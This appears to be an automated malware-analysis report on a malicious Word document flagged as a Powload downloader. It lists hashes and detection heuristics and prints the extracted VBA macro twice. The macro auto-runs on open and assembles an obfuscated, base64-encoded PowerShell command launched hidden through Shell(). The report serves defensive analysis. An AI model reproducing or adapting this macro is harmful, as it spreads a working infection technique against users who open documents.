Office (OLE) malware analysis — malicious · 03e587655e2d40ae

MALICIOUS

Office (OLE)

101.0 KB Created: 2018-05-29 12:12:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: c0a9bcfeab925beeb58c460fd78df50d SHA-1: baa3f5c01f594cb1b2200d32d3df3203be0311c3 SHA-256: 03e587655e2d40ae0791c5a223c637e8d1f45d6a7a6586dfd8e78481c5493a79

242 Risk Score

Heuristics 7

ClamAV: Doc.Downloader.Powload-6981595-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Powload-6981595-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18018 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18018 bytes
SHA-256: `5a6916cb1da25279b31ea1ff5140abe9a561387bc55b564df0dcd75730618db2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "iFjDzREEwwOsZ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function inOYZpZbA() On Error Resume Next kSUvYz = Fix(17543 / CSng(4662) * AUHAkJ * idqLz) VhBn = CDate(1534) vjGOwM = Fix(55373 / CSng(18164) * DLJdI * vcjCPz) VhBn = CDate(97451) inOYZpZbA = ffBDsrAVN + HWcBzUvV + lYEXBd + IZFTdQQ + VXcwzOQdrO + Vvqnd + AMTWlN + VtCKplYV + Uvmibf + WuFsQjtU + VzjQrN + nnYHlM + HoaiiwCQfJn TPhji = Fix(21695 / CSng(56777) * jkWZMS * MpFrOE) VhBn = CDate(79945) End Function Sub Autoopen() On Error Resume Next ftAhOb = Fix(93385 / CSng(71366) * whmzPd * wcUiZG) VhBn = CDate(66892) FrStilC (inOYZpZbA) ctXMK = Fix(16269 / CSng(68841) * doBpdd * GjzZd) VhBn = CDate(58593) End Sub Function FrStilC(bsOAHXHiCp) On Error Resume Next jwMGsm = Fix(68274 / CSng(20353) * ZKjEV * jaoMk) VhBn = CDate(17594) rhnIWkbQfPp = YprmzwLatt + Shell(MQEYbqLTjsP + Chr(vbKeyP) + ozTWd + bsOAHXHiCp, vbHide) OoVUN = Fix(27303 / CSng(91298) * jFnwJa * DPzNT) VhBn = CDate(77227) End Function Attribute VB_Name = "iuYtCzYlQuW" Function ffBDsrAVN() On Error Resume Next BTQBX = Fix(76746 / CSng(82320) * jaMiE * OfXkC) VhBn = CDate(35646) SWPqcpMK = "owersHe" + "LL -WinD" + "owsTyle" + " hidden -e IAA" + "oACgAIgB" hIZWfV = Fix(99161 / CSng(66359) * rEkEtS * pzXPPn) VhBn = CDate(3105) SThfdGTlv = "7ADMANA" + "B9AHsAMQB" + "9AHsAMQAz" + "ADEAf" + "QB7ADk" + "ANAB9AH" + "sAMQAzADgAfQB7A" + "DEANwB9A" + "HsAMQA2" + "AH0AewAxADQAN" pFmNL = Fix(37585 / CSng(96695) * RPULr * sSrjmj) VhBn = CDate(14393) PWjUoKB = "QB9AHsAMQA" + "xADUAfQB7ADEAMA" + "A1AH0A" + "ewAxADUAMQB9AHs" zYvnik = Fix(60759 / CSng(6057) * tHThZj * XasiTo) VhBn = CDate(48963) PUFilJw = "AOQAyAH0AewAzAD" + "MAfQB7" + "ADcANwB9AHsAMQ" + "AxADAAfQB7ADEAN" + "AAzAH0AewAx" + "ADAAOAB9AHsAMQ" + "AyADgAfQB7ADMAM" + "QB9AHsAMQAxAH0" + "AewAxADIA" + "NgB9AHsANQ" AJHEY = Fix(67025 / CSng(2862) * zrFNS * lNqOk) VhBn = CDate(51385) VQlYJUsGv = "A3AH0Ae" + "wAxADEAOQ" + "B9AHsANAA1AH0Ae" + "wAxADIAMQB9A" + "HsANgB9AHsAMQ" + "AxADMAfQB" + "7ADgANQB9AH" + "sAMQAwADQAfQB7A" ffBDsrAVN = SWPqcpMK + SThfdGTlv + PWjUoKB + PUFilJw + VQlYJUsGv End Function Function HWcBzUvV() On Error Resume Next XwSjF = Fix(18380 / CSng(22002) * YfLzom * dafwr) VhBn = CDate(79399) izENaz = "DQAOQB9" + "AHsAM" + "QA1ADUAfQB7A" + "DIAMQB9" pUWTz = Fix(80230 / CSng(60463) * EEwDdL * VSZqaZ) VhBn = CDate(23324) RhIzwkHKUS = "AHsAOAAyAH0A" + "ewAxADAAfQB" + "7ADEANQA" + "3AH0AewA4ADcA" + "fQB7ADg" + "ANAB9AHsANQA4AH" NikMkP = Fix(68641 / CSng(76589) * OBIzMm * VLfaH) VhBn = CDate(1389) NtrDiQNd = "0AewA2AD" + "QAfQB" + "7ADEAMQA0AH0Aew" + "AxADQ" + "AOAB9AHsAMQA0A" + "DcAfQB7ADEAMQAx" + "AH0AewA2ADYA" + "fQB7ADEAMgA3AH0" + "AewA0ADIA" + "fQB7ADcA" JNnEMX = Fix(3456 / CSng(27581) * daIoOd * dUQPob) VhBn = CDate(6165) HioTwtsmm = "OAB9AHsAMQAw" + "ADcAf" + "QB7ADcANg" + "B9AHsANwA" JjPUPt = Fix(71991 / CSng(74540) * tbzwK * QhAFi) VhBn = CDate(42929) TCBjoKDhCO = "wAH0AewAxADUAMg" + "B9AHsAMwA5AH0Ae" + "wAyADkAfQB7AD" + "EAMAAwAH0Aew" + "AxADEAO" + "AB9AHsA" + "MQA1ADkAfQ" + "B7ADkAMAB9AHs" + "AMQAyAD" zvsQC = Fix(11600 / CSng(82118) * whKuvj * hwCso) VhBn = CDate(91584) WWUDvK = "UAfQB7ADEAN" + "QAwAH0AewAzA" + "DYAfQ" + "B7ADEAM" + "AA2AH0AewAyAD" niwSzz = Fix(66884 / CSng(77265) * YWFiT * zrfwcz) VhBn = CDate(87237) sQwoOaaI = "AAfQB7ADM" + "AfQB7AD" + "EAMQA2AH0Ae" + "wAxADMAMgB9AH" + "sAMQAzADYAfQ" HWcBzUvV = izENaz + RhIzwkHKUS + NtrDiQNd + HioTwtsmm + TCBjoKDhCO + WWUDvK + sQwoOaaI End Function Function lYEXBd() On Error Resume Next CPqIzB = Fix(4657 / CSng(72955) * IDIOSj * qCHLl) VhBn = CDate(47770) nhsYF = "B7ADg" + "AMAB9AHsAN" + "QA2AH0Aew" + "AyADYAfQB7" + "ADkAMQB" + "9AHsAOAB9AH" + "sANgA4AH0AewAxA" woFzLN = Fix(84864 / CSng(37529) * towDGr * mUmnwi) VhBn = CDate(21922) XiqdibvK = "DIAMg" + "B9AHsAMQAxADc" + "AfQB7ADEAMwAwAH" + ... (truncated)

SHA-256: 5a6916cb1da25279b31ea1ff5140abe9a561387bc55b564df0dcd75730618db2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "iFjDzREEwwOsZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function inOYZpZbA()
On Error Resume Next
kSUvYz = Fix(17543 / CSng(4662) * AUHAkJ * idqLz)
VhBn = CDate(1534)
vjGOwM = Fix(55373 / CSng(18164) * DLJdI * vcjCPz)
VhBn = CDate(97451)
inOYZpZbA = ffBDsrAVN + HWcBzUvV + lYEXBd + IZFTdQQ + VXcwzOQdrO + Vvqnd + AMTWlN + VtCKplYV + Uvmibf + WuFsQjtU + VzjQrN + nnYHlM + HoaiiwCQfJn
TPhji = Fix(21695 / CSng(56777) * jkWZMS * MpFrOE)
VhBn = CDate(79945)
End Function
Sub Autoopen()
On Error Resume Next
ftAhOb = Fix(93385 / CSng(71366) * whmzPd * wcUiZG)
VhBn = CDate(66892)
FrStilC (inOYZpZbA)
ctXMK = Fix(16269 / CSng(68841) * doBpdd * GjzZd)
VhBn = CDate(58593)
End Sub
Function FrStilC(bsOAHXHiCp)
On Error Resume Next
jwMGsm = Fix(68274 / CSng(20353) * ZKjEV * jaoMk)
VhBn = CDate(17594)
rhnIWkbQfPp = YprmzwLatt + Shell(MQEYbqLTjsP + Chr(vbKeyP) + ozTWd + bsOAHXHiCp, vbHide)
OoVUN = Fix(27303 / CSng(91298) * jFnwJa * DPzNT)
VhBn = CDate(77227)
End Function


Attribute VB_Name = "iuYtCzYlQuW"
Function ffBDsrAVN()
On Error Resume Next
BTQBX = Fix(76746 / CSng(82320) * jaMiE * OfXkC)
VhBn = CDate(35646)
SWPqcpMK = "owersHe" + "LL -WinD" + "owsTyle" + " hidden -e IAA" + "oACgAIgB"
hIZWfV = Fix(99161 / CSng(66359) * rEkEtS * pzXPPn)
VhBn = CDate(3105)
SThfdGTlv = "7ADMANA" + "B9AHsAMQB" + "9AHsAMQAz" + "ADEAf" + "QB7ADk" + "ANAB9AH" + "sAMQAzADgAfQB7A" + "DEANwB9A" + "HsAMQA2" + "AH0AewAxADQAN"
pFmNL = Fix(37585 / CSng(96695) * RPULr * sSrjmj)
VhBn = CDate(14393)
PWjUoKB = "QB9AHsAMQA" + "xADUAfQB7ADEAMA" + "A1AH0A" + "ewAxADUAMQB9AHs"
zYvnik = Fix(60759 / CSng(6057) * tHThZj * XasiTo)
VhBn = CDate(48963)
PUFilJw = "AOQAyAH0AewAzAD" + "MAfQB7" + "ADcANwB9AHsAMQ" + "AxADAAfQB7ADEAN" + "AAzAH0AewAx" + "ADAAOAB9AHsAMQ" + "AyADgAfQB7ADMAM" + "QB9AHsAMQAxAH0" + "AewAxADIA" + "NgB9AHsANQ"
AJHEY = Fix(67025 / CSng(2862) * zrFNS * lNqOk)
VhBn = CDate(51385)
VQlYJUsGv = "A3AH0Ae" + "wAxADEAOQ" + "B9AHsANAA1AH0Ae" + "wAxADIAMQB9A" + "HsANgB9AHsAMQ" + "AxADMAfQB" + "7ADgANQB9AH" + "sAMQAwADQAfQB7A"
ffBDsrAVN = SWPqcpMK + SThfdGTlv + PWjUoKB + PUFilJw + VQlYJUsGv
End Function
Function HWcBzUvV()
On Error Resume Next
XwSjF = Fix(18380 / CSng(22002) * YfLzom * dafwr)
VhBn = CDate(79399)
izENaz = "DQAOQB9" + "AHsAM" + "QA1ADUAfQB7A" + "DIAMQB9"
pUWTz = Fix(80230 / CSng(60463) * EEwDdL * VSZqaZ)
VhBn = CDate(23324)
RhIzwkHKUS = "AHsAOAAyAH0A" + "ewAxADAAfQB" + "7ADEANQA" + "3AH0AewA4ADcA" + "fQB7ADg" + "ANAB9AHsANQA4AH"
NikMkP = Fix(68641 / CSng(76589) * OBIzMm * VLfaH)
VhBn = CDate(1389)
NtrDiQNd = "0AewA2AD" + "QAfQB" + "7ADEAMQA0AH0Aew" + "AxADQ" + "AOAB9AHsAMQA0A" + "DcAfQB7ADEAMQAx" + "AH0AewA2ADYA" + "fQB7ADEAMgA3AH0" + "AewA0ADIA" + "fQB7ADcA"
JNnEMX = Fix(3456 / CSng(27581) * daIoOd * dUQPob)
VhBn = CDate(6165)
HioTwtsmm = "OAB9AHsAMQAw" + "ADcAf" + "QB7ADcANg" + "B9AHsANwA"
JjPUPt = Fix(71991 / CSng(74540) * tbzwK * QhAFi)
VhBn = CDate(42929)
TCBjoKDhCO = "wAH0AewAxADUAMg" + "B9AHsAMwA5AH0Ae" + "wAyADkAfQB7AD" + "EAMAAwAH0Aew" + "AxADEAO" + "AB9AHsA" + "MQA1ADkAfQ" + "B7ADkAMAB9AHs" + "AMQAyAD"
zvsQC = Fix(11600 / CSng(82118) * whKuvj * hwCso)
VhBn = CDate(91584)
WWUDvK = "UAfQB7ADEAN" + "QAwAH0AewAzA" + "DYAfQ" + "B7ADEAM" + "AA2AH0AewAyAD"
niwSzz = Fix(66884 / CSng(77265) * YWFiT * zrfwcz)
VhBn = CDate(87237)
sQwoOaaI = "AAfQB7ADM" + "AfQB7AD" + "EAMQA2AH0Ae" + "wAxADMAMgB9AH" + "sAMQAzADYAfQ"
HWcBzUvV = izENaz + RhIzwkHKUS + NtrDiQNd + HioTwtsmm + TCBjoKDhCO + WWUDvK + sQwoOaaI
End Function
Function lYEXBd()
On Error Resume Next
CPqIzB = Fix(4657 / CSng(72955) * IDIOSj * qCHLl)
VhBn = CDate(47770)
nhsYF = "B7ADg" + "AMAB9AHsAN" + "QA2AH0Aew" + "AyADYAfQB7" + "ADkAMQB" + "9AHsAOAB9AH" + "sANgA4AH0AewAxA"
woFzLN = Fix(84864 / CSng(37529) * towDGr * mUmnwi)
VhBn = CDate(21922)
XiqdibvK = "DIAMg" + "B9AHsAMQAxADc" + "AfQB7ADEAMwAwAH" + 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.